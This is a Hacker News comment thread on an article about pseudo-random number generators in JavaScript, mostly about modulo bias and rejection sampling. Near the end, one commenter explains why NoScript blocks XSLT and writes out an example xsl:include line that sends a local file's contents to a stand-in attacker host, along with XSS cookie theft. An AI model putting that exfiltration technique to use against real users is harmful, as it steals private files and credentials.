

Better random numbers for javascript - acqq
http://baagoe.com/en/RandomMusings/javascript/

======
cscheid
"To obtain an integer in [0, n[, one may simply take the remainder modulo n"

Isn't that the wrong way? IIRC, most PRNGs behave badly in low-order bits. I
always heard that you want to keep the high-order bits around instead via the
appropriate integer division.
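For a power-of-two-modulus LCG, the weakness of the low-order bits is easy to demonstrate. The constants below are the well-known Numerical Recipes pair, chosen here purely for illustration (they are not from the article):

```javascript
// For x' = (a*x + c) mod 2^32 with a and c both odd, the lowest
// bit of the state simply alternates 0,1,0,1,... on every step.
let s = 1;
const lowBits = [];
for (let i = 0; i < 8; i++) {
  s = (Math.imul(1664525, s) + 1013904223) >>> 0; // LCG step mod 2^32
  lowBits.push(s & 1);
}
console.log(lowBits.join('')); // the low bit has period 2
```

So a program that builds small ranges from the low bits of such a generator gets a sequence with an obvious pattern, while the high bits behave much better.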

~~~
acqq
With a simple LCG you shouldn't do that, but there aren't any simple LCGs
among the implementations to which that sentence refers.

~~~
tzs
It's still bad in general even if the PRNG is perfect.

For example, suppose r() is a random number generator that generates random
integers in [0, 4294967295]. Suppose I want a random integer in [0,
3000000000]. If I simply take r() % 3000000001, I will get a horrible
distribution. A given integer in [0, ~1300000000] will occur twice as often
as a given integer in [~1300000000, 3000000000].

Given a perfect uniform random number generator r() generating integers in
[0,M-1], r()%n will only be uniform if n divides M. Otherwise, M%n of the
residues will be overrepresented, appearing (for n much smaller than M)
approximately 1+n/M times as often as they should.
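The pigeonhole count is easy to verify exhaustively with a small M and n (the values here are illustrative choices of mine, not from the comment):

```javascript
// Reduce every output of a uniform generator over [0, M-1] with a
// plain modulo and count how often each residue appears.
const M = 256, n = 10;
const counts = new Array(n).fill(0);
for (let r = 0; r < M; r++) counts[r % n]++;
// M % n = 6 residues (0..5) appear ceil(M/n) = 26 times each;
// the remaining four residues appear floor(M/n) = 25 times each.
console.log(counts);
```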

~~~
acqq
Does your claim still hold for an r() with a period longer than 2^100, the
shortest among the algorithms he presents?

~~~
tzs
Yes. My claim holds even for a true random number generator that has no
period.

It's a pigeonhole problem. If you are trying to put M pigeons into n
pigeonholes, and M is not a multiple of n, you can't put the same number of
pigeons in each hole.

The right way, given that r() generates integers in [0,M-1] and you want an
integer in [0,n-1], is to first compare r() to floor(M/n)*n, the largest
multiple of n that fits in the range. If r() is greater than or equal to that,
discard that value of r() and try again. Once you have an r below that limit,
take it mod n to get your number in [0,n-1].
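A sketch of that rejection loop in JavaScript (the small M and the stand-in r() are mine, for illustration only):

```javascript
const M = 256, n = 10;
const limit = Math.floor(M / n) * n; // 250, largest multiple of n <= M
// Stand-in for a uniform generator over [0, M-1].
function r() { return Math.floor(Math.random() * M); }
function uniformMod() {
  let x;
  do { x = r(); } while (x >= limit); // discard the biased tail
  return x % n;
}
```

Every residue 0..n-1 now corresponds to exactly floor(M/n) accepted values, so the result is exactly uniform; a draw is rejected with probability (M % n)/M, which is rare when M is much larger than n.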

Alternatively, you can reject r() that is less than M%n:

    
    
       /* reject the M % n low values that would be overrepresented */
       while ((this_r = r()) < M % n)
         ;
       return this_r % n;
    

PS: note that other methods of reducing a range [0,M-1] to [0,n-1] also have
to worry about this; it is not limited to methods using mod. If you ignore
the pigeonhole problem, the only difference is that the various range
reduction methods distribute their bias differently across the output range.
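For instance, the scale-and-floor reduction floor(r()*n/M) carries exactly the same total bias, but interleaves the overrepresented outputs instead of bunching them at the low end (the small M and n here are illustrative values of mine):

```javascript
// Count outputs of the scale-and-floor reduction over a full
// uniform range [0, M-1].
const M = 256, n = 10;
const counts = new Array(n).fill(0);
for (let r = 0; r < M; r++) counts[Math.floor(r * n / M)]++;
console.log(counts); // 26s and 25s, interleaved rather than contiguous
```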

~~~
jbaagoe
You are quite right, of course. One should only tolerate such quick and dirty
solutions if M is much bigger than n - but then, that is often the case.

~~~
acqq
I made a test to get numbers 0..99 from the C stdlib random(), which gives
16-bit numbers and has a period of 2^32, and that was enough to actually see
the bias once enough numbers (but far fewer than a full period) were
generated. Even for such a small range. I'd say the problem is very real, not
just theoretical.
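With the parameters described (16-bit outputs reduced mod 100) the bias can be counted exhaustively; it is only about one part in 656, which is why many samples are needed before it shows up statistically:

```javascript
// Exhaustive count over the full 16-bit output range reduced mod 100,
// mirroring the experiment described above.
const M = 65536, n = 100;
const counts = new Array(n).fill(0);
for (let r = 0; r < M; r++) counts[r % n]++;
// Residues 0..35 (M % n = 36 of them) get one extra hit each.
console.log(counts[0], counts[99]);
```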

------
jbaagoe
I have tentatively copied that page to a wiki. The license issues have been
clarified in the process.

Here it is:
[http://baagoe.org/en/wiki/Better_random_numbers_for_javascri...](http://baagoe.org/en/wiki/Better_random_numbers_for_javascript)

------
romaniv
Impressive work, but I really feel the kind of issues the author had to
overcome are also the reasons for avoiding JavaScript in general programming
(which would require quality RNGs).

~~~
trebor
Unless I'm mistaken, he's laying the reason/groundwork for a replacement PRNG
for Javascript/ECMAScript. If one of these algorithms were executed in the
backend, it would be quite fast and have none of the "javascript slowdowns" for
those calculations.

~~~
acqq
Nobody needs to do "the groundwork" of implementing the existing algorithms in
JS if they would be "in the backend." The reason the author did it was to have
different algorithms, each with its own strengths and weaknesses, giving the
same repeatable results on the existing platforms, implemented in pure JS and
with a common interface.

Additionally he presented his own algorithm inspired by Marsaglia's MWC.
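For reference, a multiply-with-carry step in the Marsaglia style looks like the sketch below; the constants and seeding are common textbook choices of mine, not the author's actual generator:

```javascript
// One 16-bit multiply-with-carry lane: the new state is the low 16
// bits of a*x + carry, and the new carry is the high bits.
function makeMwc(seed) {
  let x = (seed & 0xffff) || 1; // 16-bit state; avoid all-zero state
  let c = 12345;                // arbitrary initial carry
  return function () {
    const t = 36969 * x + c;    // fits comfortably in a double
    x = t & 0xffff;
    c = t >>> 16;
    return x / 65536;           // uniform-ish float in [0, 1)
  };
}
```

Two generators made from the same seed produce the same stream, which is exactly the repeatability across platforms that the parent comment mentions.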

------
valyala
It's a shame the ECMAScript standard lacks a cryptographically secure random
number generator.

------
Muzza
That site degrades /awfully/ without Javascript.

~~~
mike-cardwell
I see you're a NoScript user. The site looks absolutely fine without
JavaScript enabled. What you're experiencing is one of NoScript's additional
features: it also disables XSLT. If you go into NoScript's advanced
options, you'll find a checkbox that you can untick to re-enable XSLT.

I'm not actually sure why NoScript disables XSLT. I'm sure it will be
documented somewhere though.

~~~
infinity
Strange things can sometimes be done with XSLT, for example by using external
entities. An external entity can be a file that stores part of a DTD or
something else. It could be an interesting file on your system, say we call it
something like 'blah'. Then we can send &blah; to our evil server:

<xsl:include href="hxxp://evil.example.com/hello?&blah;" />

This is similar to stealing cookies with JavaScript through a cross-site
scripting vulnerability by adding a new image to the page, hotlinked from an
evil server and passing cookie information as a parameter.

~~~
mike-cardwell
Am I right in thinking that there aren't any _known_ exploits of this variety,
though? And why is XSLT more dangerous than HTML?

